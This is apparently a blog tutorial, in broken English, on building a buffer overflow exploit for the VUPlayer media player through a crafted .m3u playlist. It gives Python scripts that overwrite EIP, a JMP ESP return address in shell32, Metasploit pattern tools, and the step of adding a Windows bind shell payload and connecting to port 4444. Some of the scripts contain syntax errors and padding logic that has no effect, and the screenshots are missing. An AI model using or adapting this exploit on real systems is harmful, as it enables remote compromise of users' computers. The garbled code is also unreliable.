BUFFER OVERPLOW EXPLOIT VUPLAYERS

OK before we get into the first topic of discussion that we know the menus are in the VUPlayer, In the file there is a menu as shown below :


Next in the view as shown below :





Next in the visual as show below : 


Ok now we try to plug fuzzernya in the visual menu as we see drawn on how we get used to the place where aflikasi VUPlayer installed there we could see what I can get the menu to enter our fuzzer for detail have drawn below.
I previously had tried to get my Visual input to the menu to format fuzzer dsitu. etc. but the results were not satisfactory even in the menu on the visual missing one,,, hahahahaha

Well now I'll try to make the fuzzer as below 

#!/usr/bin/python
filename='crash.m3u'
cimon=open(filename,'w')
buffer="\x41" * 50000
cimon.write(buffer)
cimon.close()



Then we open it VUPlayer and select open Playlist


Then we select the folder where you save the fuzzer that we have made our opening ".m3u" and type command "python data.py" at console




See what happens when we open the file "crash.m3u" if it means missing VUPlayer, VUPlayer applications have been hit by fuzzer that we make.

Then we open OllyDbg and run VUPlayer we see the result 'A' which we enter into what it is yet

Picture above shows the value of EIP register are affected




#The next step we open a new console and type the command

     #cd /pentest/exploits/framwork/tools (enter)
     #./pattern_create.rb 50000 > string_pattern.txt (enter)
     #ls
     #kate string_pattern.txt (will appear as below)




#After string_pattern.txt appear we put copies da scrip fuzzer like this:


#When it's open OllyDbg as the previous step and see what happens
#Visible on its EIP register value has changed.


#The next step we find out the byte keberapa EIP and ESP register values ​​are affected to know we are typing the command as shown below. 


#From the above picture we see the location of the stored EIP and ESP dibyte to 1012 and 1016

#Next step we edit fuzzer 

#!/usr/bin/python
filename='crash.m3u'
cimon=open(filename,'w')
buffer="\x90" * 1012
buffer+="\xDE\xFA\xDA\xBE"
cimon.write(buffer)
cimon.close()

 

#After that run olldbg and see what happens



#We see above the value of EIP register his change into BEDAFADE




#The next step we try to do the writing on the ESP is how we edit his first fuzzer and we will try to write the number 90 

#!/usr/bin/python
filename='crash.m3u'
cimon=open(filename,'w')
buffer="\x90" * 1012
buffer+="\xDE\xFA\xDA\xBE"
buffer+="\x90" * (1012-len(buffer)
buffer+="\x90" * (1016-len(buffer)
cimon.write(buffer)
cimon.close()

  
#To see the same steps as described above


#The next step to find the memory address that stores the JMP ESP command, to look for running the application using the JMP ESP Ollydbg on view menu select Executable modules
#Next select shell 32 dan ctr F and written JMP ESP






#Next Edit fuzzer



#!/usr/bin/python
filename='crash.m3u'
cimon=open(filename,'w')
buffer="\x90" * 1012
buffer+="\x1E\xFA\xB3\x7C"
buffer+="\x90" * (1012-len(buffer)
buffer+="\x90" * (1016-len(buffer)
cimon.write(buffer)
cimon.close()

#Running Ollydbg and see result


#Now we are looking for how payload as shown below Now we are looking for how payload as shown below

#Next open web browser and this address input 127.0.0.1 : 55555


#Next select payload and select win 32 at filter modules


#Select windows blind shell and follow the steps below



#Next copy payload to fuzzer
#And next type command telnet 192.168.43.3 4444 and running ollydbg to see succes or not



                                     "<GOOD LUCK AND TRY HARDER>"









 
 



 

0 comments:

Post a Comment